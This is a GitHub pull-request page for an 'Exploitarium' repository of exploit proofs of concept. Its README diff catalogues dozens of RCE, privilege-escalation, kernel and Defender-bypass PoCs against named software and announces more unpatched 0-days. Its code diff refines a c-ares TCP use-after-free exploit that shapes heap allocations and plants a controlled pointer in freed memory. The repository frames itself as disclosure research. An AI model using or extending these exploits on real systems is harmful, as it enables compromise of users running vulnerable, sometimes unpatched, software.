Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
73 commits
Select commit Hold shift + click to select a range
e092962
Update README.md
bikini Jun 26, 2026
da77380
Update README.md
bikini Jun 26, 2026
380e5b9
Add FFmpeg RASC DLTA calc PoC
bikini Jun 26, 2026
a5a6115
Update README.md
bikini Jun 27, 2026
554980b
Update README.md
bikini Jun 27, 2026
8e0700c
Update README.md
bikini Jun 27, 2026
a41de62
Create librenms-ssti-rce.md
Unrealisedd Jun 27, 2026
8251c7c
Fix c-ares PoC trace flag handling
bikini Jun 27, 2026
0e57a00
Broaden c-ares PoC allocation shaping
bikini Jun 27, 2026
56b2a6f
Drain c-ares loop after control callback
bikini Jun 27, 2026
2449407
Make c-ares PoC search retry deterministic
bikini Jun 27, 2026
b9a5565
Update README.md
bikini Jun 27, 2026
e72afcd
Update README.md
bikini Jun 27, 2026
36c21f7
Update README.md
bikini Jun 27, 2026
11793c4
Update README.md
bikini Jun 27, 2026
b42a7b8
Add security vulnerability report for Discord Desktop
Unrealisedd Jun 28, 2026
55aaa8d
Fix title formatting in Wazuh stack overflow report
Unrealisedd Jun 28, 2026
e177bae
Add files via upload
Unrealisedd Jun 28, 2026
2b6ce99
Add SSRF protection bypass report for Nextcloud
Unrealisedd Jun 28, 2026
5eac8bb
Create xxe-file-read-and-ssrf.md
Unrealisedd Jun 28, 2026
add74cb
Add documentation for SSRF vulnerability in n8n OAuth2
Unrealisedd Jun 28, 2026
6e0675e
Add vulnerability report for Fluent Bit collectd parser
Unrealisedd Jun 28, 2026
898953a
Merge branch 'bikini:main' into main
Unrealisedd Jun 28, 2026
ea13c84
Update README.md
bikini Jun 28, 2026
8d1d29b
Add portable RASC DLTA calc PoC helper
bikini Jun 28, 2026
ff4ed29
Update README.md
bikini Jun 28, 2026
c438bda
Create cves.md
bikini Jun 28, 2026
c700676
Update cves.md
bikini Jun 28, 2026
d2fc9ec
Update cves.md
bikini Jun 28, 2026
f00fa9c
Update cves.md
bikini Jun 28, 2026
8db8b4c
Update cves.md
bikini Jun 28, 2026
75dec43
Merge branch 'bikini:main' into main
Unrealisedd Jun 28, 2026
eece0aa
Document kernel vulnerabilities in ovpn-dco-win
Unrealisedd Jun 28, 2026
77cc5de
Merge branch 'bikini:main' into main
Unrealisedd Jun 28, 2026
5359450
add ovpn-dco UAF poc
Unrealisedd Jun 28, 2026
01abfc3
update ovpn-dco readme
Unrealisedd Jun 28, 2026
25db9ad
Update README.md
bikini Jun 29, 2026
a2047b5
Update README.md
bikini Jun 29, 2026
6a841ec
ovpn-dco: crash PoC for CNG key UAF in V1 rekey handler
Unrealisedd Jun 29, 2026
abfa3ad
StorSvc DLL hijack LPE: LoadLibraryW without LOAD_LIBRARY_SEARCH_SYST…
Unrealisedd Jun 29, 2026
e7f9e89
dam.sys: 3 kernel bugs from standard user (BSOD + confused deputy + D…
Unrealisedd Jun 29, 2026
575c81b
Merge branch 'bikini:main' into main
Unrealisedd Jun 29, 2026
e334b7f
SEB service auth bypass: unauthenticated WCF connection to SYSTEM ser…
Unrealisedd Jun 29, 2026
cb5e514
CVE-2026-45498 patch bypass: FILE_SHARE_READ locks Defender sigs on p…
Unrealisedd Jun 29, 2026
7229336
defender lock bypass: scan all 3 dirs, clean up poc + writeup
Unrealisedd Jun 29, 2026
8aef451
Update README with project origin and author insights
Unrealisedd Jun 29, 2026
3ee4f92
README: add attribution for original work, separate my additions
Unrealisedd Jun 29, 2026
0185b95
Update README.md
bikini Jul 1, 2026
83cd625
Add July direct exploitarium entries
bikini Jul 1, 2026
02e9a1c
Update README.md
bikini Jul 1, 2026
e095662
Merge branch 'bikini:main' into main
Unrealisedd Jul 1, 2026
4ce4a0f
Add Ladybird WebAssembly ESM host function RCE PoC
bikini Jul 1, 2026
7a28951
Add NodeBB ActivityPub attributedTo spoof PoC
bikini Jul 1, 2026
b5f8efb
Add Pillow ImageCms output mode PoC
bikini Jul 1, 2026
21393d5
Add QEMU CXL Type-3 mailbox escape PoC
bikini Jul 1, 2026
cbeb27f
Add Gogs admin CSRF Git hook RCE PoC
bikini Jul 1, 2026
a8fb18d
Overwolf Updater LPE: standard user to SYSTEM via forged Authenticode…
Unrealisedd Jul 1, 2026
a6bf6ec
Merge branch 'bikini:main' into main
Unrealisedd Jul 1, 2026
780ae35
add spacedesk service DACL LPE poc
Unrealisedd Jul 1, 2026
d46778c
Update cves.md
bikini Jul 2, 2026
06f4b17
Merge branch 'bikini:main' into main
Unrealisedd Jul 2, 2026
24b3803
Add Woodpecker CI YAML injection + RetroArch CHD heap overflow
Unrealisedd Jul 2, 2026
2a5ef6b
Add missing entries to My Additions table (overwolf, spacedesk)
Unrealisedd Jul 2, 2026
d8d3cbb
SEB service: upgrade to Critical — confirmed RCE as SYSTEM via log in…
Unrealisedd Jul 2, 2026
7e4f722
Fix README for upstream PR — remove fork-specific language
Unrealisedd Jul 2, 2026
f6db4bb
Add Nextcloud federated share bearer token PoC
bikini Jul 3, 2026
77b65f9
Add Discourse scoped API key route bypass PoC
bikini Jul 3, 2026
04f8471
Add Redis vector set RCE PoC
bikini Jul 3, 2026
35da066
Merge branch 'bikini:main' into main
Unrealisedd Jul 3, 2026
302d2d2
Add PostgreSQL RI implicit cast PoC
bikini Jul 4, 2026
8973d60
Merge branch 'bikini:main' into main
Unrealisedd Jul 4, 2026
f85d9a3
Update README.md
Unrealisedd Jul 6, 2026
f7c3a8a
Add Windows Defender NTLM coercion PoC
Unrealisedd Jul 6, 2026
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions .gitattributes
Original file line number Diff line number Diff line change
Expand Up @@ -3,3 +3,4 @@
*.sh text eol=lf
*.md text eol=lf
*.txt text eol=lf
*.c text eol=lf
60 changes: 56 additions & 4 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,38 +1,84 @@
New unpatched RCE on libssh2 upstream commit coming later today, as well as something big for PHP.
https://discord.gg/WytKH65ZR join up for research, help, documentation, and more useful information for those interested.

Sharing this repo keeps me motivated to continue dropping 0-days for you all.
# News/Contact

Credit for the objdump finding goes to someone who beat me to it (and has a better PoC): https://github.com/4D4J/objdump-Out-Of-Bounds-write

New drops today ;) Biggest thing yet (DELAYED, I PROMISE THE WAIT WILL BE WORTH IT! After this, you guys will *usually* get one new PoC a day)

I've also noticed a surprising amount of "security researchers" aren't able to adjust the PoC to work in their environment. I will broaden the PoCs for those select few...

If you wish to collaborate/discuss with me, contact me on discord @ashdfrkl

Sharing this repo keeps me motivated to continue dropping my findings for you all.

Open an issue if you have a specific request for software you want me to take a look at.

# Exploitarium

A consolidated archive of my public proof-of-concept and vulnerability research writeups.

Most folders contain one of my former standalone PoC repos, preserved with its original README and tracked files. New research entries are added directly here as self-contained folders.

## Contributed Research (by [Unrealisedd](https://github.com/Unrealisedd))

The following entries were contributed via PR:

| Folder | Description |
| --- | --- |
| `openvpn-UAF-BYOVD` | ovpn-dco-win kernel driver CNG key UAF + crash PoC |
| `storsvc-dll-hijack-lpe` | StorSvc `LoadLibraryW("SprintCSP.dll")` without `LOAD_LIBRARY_SEARCH_SYSTEM32` |
| `dam-sys-kernel-bugs` | dam.sys: 3 kernel bugs from standard user (BSOD + confused deputy + Defender freeze) |
| `seb-service-auth-bypass-lpe` | Safe Exam Browser SYSTEM service auth bypass → RCE as SYSTEM via log injection |
| `defender-signature-lock-bypass` | CVE-2026-45498 patch bypass: `FILE_SHARE_READ` locks Defender signatures |
| `discord` | Discord Desktop RCE attack paths |
| `wazuh` | Wazuh stack BOF + SCA DoS |
| `nextcloud` | XXE file read/SSRF + SSRF protection bypass |
| `n8n-ssrf-via-oauth2` | SSRF via OAuth2 callback in n8n |
| `fluentbit-infinite-dos` | Fluent Bit collectd parser unauth DoS loop |
| `librenms-RCE-chain` | LibreNMS SSTI to RCE chain |
| `overwolf-updater-lpe-poc` | Overwolf Updater forged Authenticode cert + insecure service DACL → SYSTEM LPE |
| `spacedesk-service-lpe-poc` | spacedesk service Everyone full-control DACL → SYSTEM in 3 commands |
| `woodpecker-yaml-cr-injection` | Woodpecker CI pipeline RCE via `\r` YAML injection bypass |
| `retroarch-chd-map-heap-overflow` | RetroArch libchdr integer overflow → heap OOB write on 32-bit |
| `defender-ntlm-coercion-poc` | Windows Defender NTLM coercion: standard user forces SYSTEM credential leak via UNC scan |

## Contents

| Folder | Source | Tracked entries |
| --- | --- | ---: |
| `7zip-rar5-motw-chain-poc` | `bd9533f532c1e4ee6af783b9bb49d1133c600e2c` | 3 |
| `anydesk-printer-com-impersonation-poc` | `7491303301093b2d40bee9dadf6b38f757ce78e0` | 4 |
| `c-ares-tcp-uaf-calc-poc` | direct entry, June 24, 2026 | 7 |
| `curl-smtp-expn-recipient-crlf-injection` | direct entry, July 1, 2026 | 3 |
| `defender-ntlm-coercion-poc` | direct entry, July 6, 2026 | 3 |
| `discourse-scoped-api-key-preauth-bypass` | direct entry, July 3, 2026 | 3 |
| `docker-cp-copyout-destination-escape` | `d1367b1381736d7f961ac808ce88d4e24a633adc` | 5 |
| `firefox-smartwindow-private-url-exfil-poc` | direct entry, June 24, 2026 | 3 |
| `floci-apigateway-vtl-rce-poc` | direct entry, June 23, 2026 | 3 |
| `flowise-mcp-env-case-bypass-poc` | `ed9fab0086674f1b16467990b33bb9299e93429e` | 3 |
| `ffmpeg-rasc-dlta-calc-poc` | direct entry, June 26, 2026 | 7 |
| `ghidra-12.1.2-rce-ace-calc-poc` | `52dee6362990c03c0d753d074c85428824d46368` | 9 |
| `gitea-act-runner-container-options-poc` | `f06d78fb111732f3e7737f4c07e77ef94c4b64bf` | 4 |
| `gogs-admin-csrf-git-hook-rce-poc` | direct entry, July 1, 2026 | 3 |
| `imagemagick-gs-delegate-hijack-poc` | `8140e8ee0ed78beaf5e8303a795b70b138f5891b` | 5 |
| `ladybird-wasm-esm-host-function-rce-poc` | direct entry, July 1, 2026 | 2 |
| `libarchive-zip-debuginfod-size-boundary` | direct entry, July 1, 2026 | 6 |
| `libssh2-cve-2026-55200-poc` | direct entry, June 23, 2026 | 3 |
| `libssh2-publickey-list-calc-poc` | direct entry, June 25, 2026 | 10 |
| `lunar-modrinth-chain-poc` | `ffd02120708b6503f11585858ce3724872f3b7a7` | 6 |
| `mybb-limited-acp-to-admin` | `1610e0373943c2f6562a99f917d3a3d1fdd9056d` | 5 |
| `nextcloud-federated-share-bearer-token-poc` | direct entry, July 3, 2026 | 3 |
| `nextjs-unstable-cache-object-argument-collision` | direct entry, July 1, 2026 | 3 |
| `nodebb-activitypub-attributedto-local-uid-spoof-poc` | direct entry, July 1, 2026 | 3 |
| `nghttp2-nghttpx-upgrade-queue-poison-poc` | direct entry, June 26, 2026 | 3 |
| `nmap-ipv6-extlen-wrap-poc` | direct entry, June 23, 2026 | 4 |
| `objdump-dlx-calc-poc` | `7df01e4e20c7375a89e8ccf760526c52eb6ad582` | 41 |
| `openvpn-connect-echo-script-ace-poc` | `d2f904d9272d4388c9862131d40e32e072e85e38` | 8 |
| `php857-streambucket-soap-rce-rpoc` | direct entry, June 26, 2026 | 6 |
| `pillow-imagecms-output-mode-oob-poc` | direct entry, July 1, 2026 | 3 |
| `postgres-ri-owner-switched-cast-poc` | direct entry, July 4, 2026 | 3 |
| `qemu-cxl-type3-mailbox-escape-poc` | direct entry, July 1, 2026 | 7 |
| `redis-vset-duplicate-hnsw-id-rce-poc` | direct entry, July 3, 2026 | 3 |
| `rustdesk-session-permission-pocs` | direct entry, June 25, 2026 | 17 |
| `systeminformer-phsvc-trusted-host-lpe-poc` | direct entry, June 24, 2026 | 3 |
| `vlc-vp9-reschange-crash-poc` | `fae72b82f24d03cf2fb9cb55fbb2e7774f684ff3` | 3 |
Expand All @@ -54,4 +100,10 @@ Matching Git blob IDs means the tracked file bytes are identical. The check cove

This repository preserves the contents of those PoCs. Repository-level metadata such as stars, issues, pull requests, releases, and separate Git history remain in the original repository histories.

Direct entries, including `c-ares-tcp-uaf-calc-poc`, `firefox-smartwindow-private-url-exfil-poc`, `floci-apigateway-vtl-rce-poc`, `libssh2-cve-2026-55200-poc`, `libssh2-publickey-list-calc-poc`, `nghttp2-nghttpx-upgrade-queue-poison-poc`, `nmap-ipv6-extlen-wrap-poc`, `php857-streambucket-soap-rce-rpoc`, `rustdesk-session-permission-pocs`, and `systeminformer-phsvc-trusted-host-lpe-poc`, are tracked by this repository's commit history.
Direct entries, including `c-ares-tcp-uaf-calc-poc`, `curl-smtp-expn-recipient-crlf-injection`, `discourse-scoped-api-key-preauth-bypass`, `ffmpeg-rasc-dlta-calc-poc`, `firefox-smartwindow-private-url-exfil-poc`, `floci-apigateway-vtl-rce-poc`, `gogs-admin-csrf-git-hook-rce-poc`, `ladybird-wasm-esm-host-function-rce-poc`, `libarchive-zip-debuginfod-size-boundary`, `libssh2-cve-2026-55200-poc`, `libssh2-publickey-list-calc-poc`, `nextcloud-federated-share-bearer-token-poc`, `nextjs-unstable-cache-object-argument-collision`, `nodebb-activitypub-attributedto-local-uid-spoof-poc`, `nghttp2-nghttpx-upgrade-queue-poison-poc`, `nmap-ipv6-extlen-wrap-poc`, `php857-streambucket-soap-rce-rpoc`, `pillow-imagecms-output-mode-oob-poc`, `postgres-ri-owner-switched-cast-poc`, `qemu-cxl-type3-mailbox-escape-poc`, `redis-vset-duplicate-hnsw-id-rce-poc`, `rustdesk-session-permission-pocs`, and `systeminformer-phsvc-trusted-host-lpe-poc`, are tracked by this repository's commit history.

## ABUSE

Do NOT, under any circumstances, use any material in this repository maliciously. This is good-faith, open-disclosure vulnerability research intended to get more people interested in exploring this area of cybersecurity.

Cybercrime is cringe.
34 changes: 26 additions & 8 deletions c-ares-tcp-uaf-calc-poc/poc/cares_tcp_uaf_calc_poc.c
Original file line number Diff line number Diff line change
Expand Up @@ -60,6 +60,11 @@ static size_t alloc_seq;
static proof_slist_t *proof_list;
static proof_slist_node_t *proof_node;

static int should_shape_size(size_t size)
{
return size == 144;
}

static void proof_marker(void *arg)
{
const char msg[] = "CARES_RCE_PAYLOAD_TRIGGERED\n";
Expand Down Expand Up @@ -114,8 +119,9 @@ static void *tracked_malloc(size_t size)
hdr->magic = 0xc0decafef00dbeefu;
hdr->next = NULL;
memset(hdr + 1, 0x55, size);
if (trace_allocator && size == 144) {
fprintf(stderr, "ALLOC%zu size144 %p\n", ++alloc_seq, (void *)(hdr + 1));
if (trace_allocator && should_shape_size(size)) {
fprintf(stderr, "ALLOC%zu size%zu %p\n", ++alloc_seq, size,
(void *)(hdr + 1));
}
return hdr + 1;
}
Expand Down Expand Up @@ -149,10 +155,10 @@ static void tracked_free(void *ptr)
if (hdr->magic != 0xc0decafef00dbeefu) {
abort();
}
if (trace_allocator && hdr->size == 144) {
fprintf(stderr, "FREE size144 %p\n", ptr);
if (trace_allocator && should_shape_size(hdr->size)) {
fprintf(stderr, "FREE size%zu %p\n", hdr->size, ptr);
}
if (control_call && hdr->size == 144) {
if (control_call && should_shape_size(hdr->size)) {
ensure_proof_node();
memset(ptr, 0, hdr->size);
memcpy((unsigned char *)ptr + 48, &proof_node, sizeof(proof_node));
Expand Down Expand Up @@ -196,14 +202,14 @@ static void load_poison_byte(void)
const char *env = getenv("CARES_PROOF_POISON_BYTE");
char *end = NULL;
unsigned long value;
trace_allocator = getenv("CARES_PROOF_TRACE_ALLOC") != NULL;
if (env == NULL || *env == '\0') {
return;
}
value = strtoul(env, &end, 0);
if (end != env && value <= 255) {
poison_byte = (unsigned char)value;
}
trace_allocator = getenv("CARES_PROOF_TRACE_ALLOC") != NULL;
}


Expand Down Expand Up @@ -396,10 +402,12 @@ int main(int argc, char **argv)
ares_channel_t *channel = NULL;
struct ares_options opts;
struct ares_addrinfo_hints hints;
int optmask = ARES_OPT_FLAGS | ARES_OPT_LOOKUPS;
char *search_domains[] = { (char *)"uaf.invalid" };
int optmask = ARES_OPT_FLAGS | ARES_OPT_LOOKUPS | ARES_OPT_DOMAINS;
char server[64];
int done = 0;
int loops = 0;
int drain_after_done = 0;
char ch;

signal(SIGPIPE, SIG_IGN);
Expand Down Expand Up @@ -459,6 +467,8 @@ int main(int argc, char **argv)
opts.flags |= ARES_FLAG_USEVC;
}
opts.lookups = (char *)"b";
opts.domains = search_domains;
opts.ndomains = 1;
if (ares_init_options(&channel, &opts, optmask) != ARES_SUCCESS ||
channel == NULL) {
return 2;
Expand All @@ -471,7 +481,10 @@ int main(int argc, char **argv)
hints.ai_family = AF_INET;
ares_getaddrinfo(channel, "example.com", "80", &hints, ai_cb, &done);

while (!done && loops++ < 100) {
if (control_call) {
drain_after_done = 8;
}
while ((!done || drain_after_done-- > 0) && loops++ < 120) {
fd_set rfds;
fd_set wfds;
int nfds;
Expand All @@ -484,6 +497,11 @@ int main(int argc, char **argv)
break;
}
tvp = ares_timeout(channel, NULL, &tv);
if (done && control_call && tvp != NULL &&
(tvp->tv_sec > 0 || tvp->tv_usec > 10000)) {
tvp->tv_sec = 0;
tvp->tv_usec = 10000;
}
select(nfds, &rfds, &wfds, NULL, tvp);
ares_process(channel, &rfds, &wfds);
}
Expand Down
1 change: 1 addition & 0 deletions curl-smtp-expn-recipient-crlf-injection/.gitignore
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
run/
Loading